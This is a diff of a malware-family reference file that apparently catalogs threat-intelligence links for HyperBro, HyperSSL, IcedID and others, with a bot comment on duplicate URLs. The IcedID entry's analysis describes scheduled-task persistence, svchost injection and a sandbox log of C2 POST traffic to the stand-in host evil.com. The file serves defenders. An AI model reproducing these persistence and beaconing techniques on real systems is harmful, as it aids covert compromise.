+ "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf",
+ "https://blogs.jpcert.or.jp/ja/2022/05/HUILoader.html"
],
"synonyms": [],
"type": []
@@ -26796,6 +28290,19 @@
"uuid": "40157734-eb33-4187-bcc8-2cd168db6fda",
"value": "Hupigon"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.huskloader",
+ "https://twitter.com/SethKingHi/status/1612377098777133057"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "06649edb-d078-4403-a628-6295d1bc4ad8",
+ "value": "HuskLoader"
+ },
{
"description": "",
"meta": {
@@ -26831,45 +28338,37 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperbro",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/iron-tiger-compromises-chat-application-mimi,-targets-windows,-mac,-and-linux-users/IOCs-IronTiger-compromises-chat-application-mimi-targets-windows-mac-linux-users.txt",
- "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
- "https://blog.team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/",
- "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia",
- "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
- "https://www.secureworks.com/research/threat-profiles/bronze-union",
- "https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf",
- "https://team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/",
- "https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx",
- "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf",
- "https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/",
- "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf?__blob=publicationFile&v=10",
- "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html",
- "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel",
- "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
- "https://www.bleepingcomputer.com/news/security/german-govt-warns-of-apt27-hackers-backdooring-business-networks/",
- "https://www.trendmicro.com/en_us/research/22/h/irontiger-compromises-chat-app-Mimi-targets-windows-mac-linux-users.html",
- "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/",
"https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia",
+ "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html",
+ "https://www.secureworks.com/research/threat-profiles/bronze-union",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/iron-tiger-compromises-chat-application-mimi,-targets-windows,-mac,-and-linux-users/IOCs-IronTiger-compromises-chat-application-mimi-targets-windows-mac-linux-users.txt",
"https://securelist.com/luckymouse-hits-national-data-center/86083/",
+ "https://www.bleepingcomputer.com/news/security/german-govt-warns-of-apt27-hackers-backdooring-business-networks/",
"https://www.secureworks.com/research/a-peek-into-bronze-unions-toolbox",
"https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html",
"https://cyware.com/news/apt27-group-targets-german-organizations-with-hyperbro-2c43b7cf/",
- "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop",
+ "https://www.trendmicro.com/en_us/research/22/h/irontiger-compromises-chat-app-Mimi-targets-windows-mac-linux-users.html",
+ "https://blog.sekoia.io/luckymouse-uses-a-backdoored-electron-app-to-target-macos/",
+ "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/",
+ "http://www.talent-jump.com/article/2020/02/17/CLAMBLING-A-New-Backdoor-Base-On-Dropbox-en/",
+ "https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx",
+ "https://team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/",
+ "https://www.intrinsec.com/apt27-analysis/",
+ "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf",
+ "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/incident-response-polar-ransomware-apt27/",
+ "https://blog.team-cymru.com/2020/03/25/how-the-iranian-cyber-security-agency-detects-emissary-panda-malware/",
+ "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
"https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/",
- "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/"
+ "https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf",
+ "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
+ "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf?__blob=publicationFile&v=10",
+ "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop",
+ "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "e1bfe1d9-190c-4cf4-aec8-a8f2c41c7d8b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "b7f1abd3-870b-42ca-9bd1-5931126c68d5",
"value": "HyperBro"
},
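Review bot: several refs in this list are duplicates that differ only by a trailing slash (decoded.avast.io `.../east-asia` and `.../east-asia/`, welivesecurity `.../able-desktop` and `.../able-desktop/`) or by host alias (blog.team-cymru.com and team-cymru.com with the same path); normalizing URLs before dedup in the generator would remove them instead of carrying both variants forward on every regeneration.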
@@ -26891,17 +28390,19 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.hyperssl",
- "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
- "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html",
- "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel",
+ "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html",
"https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Article-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf",
- "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
+ "https://www.fireeye.com/blog/threat-research/2021/08/unc215-chinese-espionage-campaign-in-israel.html",
+ "https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Slides-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf",
"https://www.tra.gov.ae/assets/mTP39Tp6.pdf.aspx",
"https://vblocalhost.com/uploads/VB2020-Shank-Piccolini.pdf",
- "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html",
- "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/",
- "https://www.sstic.org/media/SSTIC2021/SSTIC-actes/Taking_Advantage_of_PE_Metadata_or_How_To_Complete/SSTIC2021-Slides-Taking_Advantage_of_PE_Metadata_or_How_To_Complete_your_Favorite_Threat_Actor_Sample_Collection-lunghi.pdf",
- "https://norfolkinfosec.com/emissary-panda-dll-backdoor/"
+ "https://web.archive.org/web/20200307113010/https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1574947864.pdf",
+ "https://norfolkinfosec.com/emissary-panda-dll-backdoor/",
+ "https://www.trendmicro.com/en_us/research/23/c/iron-tiger-sysupdate-adds-linux-targeting.html",
+ "https://www.mandiant.com/resources/unc215-chinese-espionage-campaign-in-israel",
+ "https://www.welivesecurity.com/wp-content/uploads/2021/04/ESET_Industry_Report_Government.pdf",
+ "https://twitter.com/ESETresearch/status/1594937054303236096",
+ "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/"
],
"synonyms": [
"FOCUSFJORD",
@@ -26911,151 +28412,209 @@
"type": []
},
"uuid": "84f43641-77bc-4dcb-a104-150e8574da22",
- "value": "HyperSSL"
+ "value": "HyperSSL (Windows)"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hzrat",
+ "https://medium.com/@DCSO_CyTec/hz-rat-goes-china-506854c5f2e2"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "eaaebc38-73d8-48b7-9927-2d2523870795",
+ "value": "HZ RAT"
+ },
+ {
+ "description": "Icarus is a modular stealer software, written in .NET. One module is the open source r77 rootkit.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.icarus",
+ "https://twitter.com/struppigel/status/1566685309093511170"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "8f1225ba-a636-488b-a288-ab777708a205",
+ "value": "Icarus"
},
{
"description": "Analysis Observations:\r\n\r\n* It sets up persistence by creating a Scheduled Task with the following characteristics:\r\n * Name: Update\r\n * Trigger: At Log on\r\n * Action: %LocalAppData%\\$Example\\\\waroupada.exe /i\r\n * Conditions: Stop if the computer ceases to be idle.\r\n* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.\r\n* The filename remained static during analysis.\r\n* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it\r\n* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.\r\n* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.\r\n* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:\r\n rundll32.exe kernel32,Sleep -s\r\n* Setup a local listener to proxy traffic on 127.0.0.1:50000\r\n\r\n**[Example Log from C2 Network Communication]**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: 
<(POSTDATA)>\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html\r\n[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid",
- "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/",
- "https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f",
- "https://twitter.com/felixw3000/status/1521816045769662468",
- "https://malwation.com/icedid-malware-technical-analysis-report/",
- "https://thedfirreport.com/2021/05/12/conti-ransomware/",
- "https://tccontre.blogspot.com/2021/01/",
- "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
- "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
- "https://blogs.vmware.com/security/2021/07/hunting-icedid-and-unpacking-automation-with-qiling.html",
- "https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/",
- "https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders",
- "https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/",
- "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
- "https://blog.talosintelligence.com/2020/12/quarterly-ir-report-fall-2020-q4.html",
- "https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/",
- "https://blog.cyberint.com/icedid-stealer-man-in-the-browser-banking-trojan",
- "https://team-cymru.com/blog/2021/05/19/tracking-bokbot-infrastructure/",
- "https://securelist.com/malicious-spam-campaigns-delivering-banking-trojans/102917",
- "https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b",
- "https://blog.minerva-labs.com/icedid-maas",
- "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
- "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html",
- "https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766",
- "https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
- "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
- "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/",
- "https://netresec.com/?b=214d7ff",
- "https://tccontre.blogspot.com/2020/08/learning-from-iceid-loader-including.html",
- "https://blog.group-ib.com/prometheus-tds",
- "https://blog.reconinfosec.com/an-encounter-with-ta551-shathak",
- "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://www.binarydefense.com/icedid-gziploader-analysis/",
- "https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/",
- "https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html",
- "https://isc.sans.edu/diary/28636",
- "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/",
- "https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/",
- "https://www.mimecast.com/globalassets/documents/whitepapers/taa551-treatresearch_final-1.15.21.pdf",
- "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html",
- "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
- "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf",
- "http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/",
- "https://github.com/telekom-security/icedid_analysis",
- "https://www.uptycs.com/blog/icedid-campaign-spotted-being-spiced-with-excel-4-macros",
- "https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/",
- "https://www.youtube.com/watch?v=wObF9n2UIAM",
- "https://unit42.paloaltonetworks.com/atoms/monsterlibra/",
- "https://blogs.juniper.net/en-us/threat-research/iceid-campaign-strikes-back",
- "https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html",
- "https://www.nri-secure.co.jp/blog/explaining-the-tendency-of-malware-icedid",
- "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
- "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
- "https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240",
- "https://www.f5.com/labs/articles/threat-intelligence/icedid-banking-trojan-uses-covid-19-pandemic-to-lure-new-victims",
- "https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/",
- "https://www.socinvestigation.com/icedid-banking-trojan-returns-with-new-ttps-detection-response/",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://nikpx.github.io/malware/analysis/2022/03/09/BokBot",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.youtube.com/watch?v=oZ4bwnjcXWg",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/",
- "https://www.youtube.com/watch?v=YEqLIR6hfOM",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
- "https://www.youtube.com/watch?v=wMXD4Sv1Alw",
- "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
- "https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
- "https://team-cymru.com/blog/2021/11/03/webinject-panel-administration-a-vantage-point-into-multiple-threat-actor-campaigns/",
- "https://www.youtube.com/watch?v=7Dk7NkIbVqY",
- "https://www.bleepingcomputer.com/news/security/microsoft-exchange-targeted-for-icedid-reply-chain-hijacking-attacks/",
- "https://blogs.juniper.net/en-us/threat-research/covid-19-and-fmla-campaigns-used-to-install-new-icedid-banking-malware",
- "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
- "https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike",
- "https://www.fortinet.com/blog/threat-research/spoofed-invoice-drops-iced-id",
"https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://research.checkpoint.com/2021/melting-ice-tracking-icedid-servers-with-a-few-simple-steps/",
- "https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites",
- "https://www.slideshare.net/codeblue_jp/cb19-cyber-threat-landscape-in-japan-revealing-threat-in-the-shadow-by-chi-en-shen-ashley-oleg-bondarenko",
- "https://isc.sans.edu/diary/IcedID+%28Bokbot%29+with+Dark+VNC+and+Cobalt+Strike/28884",
- "https://intel471.com/blog/conti-emotet-ransomware-conti-leaks",
- "https://www.bleepingcomputer.com/news/security/hackers-target-ukrainian-govt-with-icedid-malware-zimbra-exploits/",
- "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
- "https://isc.sans.edu/forums/diary/TA551+Shathak+pushes+IcedID+Bokbot/28092/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.microsoft.com/security/blog/2020/12/09/edr-in-block-mode-stops-icedid-cold/",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://eln0ty.github.io/malware%20analysis/IcedID/",
- "https://www.group-ib.com/blog/icedid",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://www.fortinet.com/blog/threat-research/deep-dive-icedid-malware-analysis-of-child-processes.html",
- "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
- "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/",
- "https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/",
- "https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/",
- "https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/",
- "https://content.secureworks.com/-/media/Files/US/Reports/Monthly%20Threat%20Intelligence/Secureworks_ECO1_ThreatIntelligenceExecutiveReport2022Vol2.ashx",
- "https://www.cybereason.com/blog/threat-analysis-report-all-paths-lead-to-cobalt-strike-icedid-emotet-and-qbot",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "https://securityintelligence.com/posts/itg23-crypters-cooperation-between-cybercriminal-groups/",
- "https://ceriumnetworks.com/threat-of-the-month-icedid-malware/",
- "https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/",
- "https://www.ironnet.com/blog/ransomware-graphic-blog",
- "https://matth.dmz42.org/posts/2022/automatically-unpacking-icedid-stage1-with-angr/",
- "https://thedfirreport.com/2022/04/25/quantum-ransomware/",
- "https://www.silentpush.com/blog/icedid-command-and-control-infrastructure",
- "https://forensicitguy.github.io/analyzing-icedid-document/",
- "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/",
- "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html",
+ "https://unit42.paloaltonetworks.com/atoms/monsterlibra/",
+ "https://kienmanowar.wordpress.com/2020/08/16/manual-unpacking-icedid-write-up/",
+ "https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion",
+ "https://thedfirreport.com/2021/06/20/from-word-to-lateral-movement-in-1-hour/",
+ "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html",
+ "https://drive.google.com/file/d/1jB0CsDvAADSrBeGxoi5gzyx8eQIiOJ2G/view",
"https://www.splunk.com/en_us/blog/security/detecting-icedid-could-it-be-a-trickbot-copycat.html",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://isc.sans.edu/forums/diary/How+the+Contact+Forms+campaign+tricks+people/28142/",
- "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/",
- "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
- "https://blogs.vmware.com/security/2021/07/icedid-analysis-and-detection.html",
+ "https://isc.sans.edu/diary/29740",
+ "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
+ "https://www.team-cymru.com/post/inside-the-icedid-backconnect-protocol",
+ "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/",
"https://github.com/f0wl/deICEr",
- "https://cert.gov.ua/article/39609",
- "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
- "https://github.com/Lastline-Inc/iocs-tools/tree/main/2021-07-IcedID-Part-2",
- "https://4rchib4ld.github.io/blog/IcedIDOnMyNeckImTheCoolest/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker",
+ "https://www.intezer.com/blog/research/conversation-hijacking-campaign-delivering-icedid/",
+ "https://www.proofpoint.com/us/blog/threat-insight/fork-ice-new-era-icedid",
+ "https://www.esentire.com/blog/conti-affiliate-exposed-new-domain-names-ip-addresses-and-email-addresses-uncovered-by-esentire",
+ "https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f",
+ "https://www.microsoft.com/security/blog/2021/04/09/investigating-a-unique-form-of-email-delivery-for-icedid-malware/",
+ "https://eln0ty.github.io/malware%20analysis/IcedID/",
+ "https://www.bleepingcomputer.com/news/security/microsoft-exchange-targeted-for-icedid-reply-chain-hijacking-attacks/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://thedfirreport.com/2022/04/25/quantum-ransomware/",
+ "https://blog.group-ib.com/prometheus-tds",
+ "https://zero2auto.com/2020/06/22/unpacking-visual-basic-packers/",
"https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise",
"https://www.silentpush.com/blog/malicious-infrastructure-as-a-service",
- "https://aaqeel01.wordpress.com/2021/04/09/icedid-analysis/",
- "https://www.cybereason.com/blog/cybereason-vs.-quantum-locker-ransomware",
- "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/rise-of-lnk-shortcut-files-malware/",
- "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/",
- "https://unit42.paloaltonetworks.com/ta551-shathak-icedid/",
- "https://isc.sans.edu/diary/rss/28934",
+ "https://unit42.paloaltonetworks.com/teasing-secrets-malware-configuration-parsing",
+ "https://www.secureworks.com/research/threat-profiles/gold-swathmore",
+ "https://www.secureworks.com/blog/gold-ulrick-leaks-reveal-organizational-structure-and-relationships",
+ "https://github.com/telekom-security/icedid_analysis",
+ "https://research.loginsoft.com/threat-research/icedid-malware-traversing-through-its-various-incarnations/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://blog.bushidotoken.net/2022/04/lessons-from-conti-leaks.html",
+ "https://www.ironnet.com/blog/ransomware-graphic-blog",
+ "https://twitter.com/embee_research/status/1592067841154756610?s=20",
+ "https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/",
+ "https://isc.sans.edu/diary/Google+ads+lead+to+fake+software+pages+pushing+IcedID+Bokbot/29344",
+ "https://www.trendmicro.com/en_us/research/21/d/a-spike-in-bazarcall-and-icedid-activity.html",
+ "https://www.trendmicro.com/en_us/research/21/j/ransomware-operators-found-using-new-franchise-business-model.html",
+ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution",
+ "https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
"https://labs.sentinelone.com/evasive-maneuvers-massive-icedid-campaign-aims-for-stealth-with-benign-macros/",
+ "https://malwation.com/icedid-malware-technical-analysis-report/",
+ "https://www.youtube.com/watch?v=YEqLIR6hfOM",
+ "https://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/",
+ "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
+ "https://github.com/Lastline-Inc/iocs-tools/tree/main/2021-07-IcedID-Part-2",
+ "https://www.cynet.com/attack-techniques-hands-on/shelob-moonlight-spinning-a-larger-web/",
+ "https://threatpost.com/exchange-servers-speared-in-icedid-phishing-campaign/179137/",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.binarydefense.com/icedid-gziploader-analysis/",
+ "https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/",
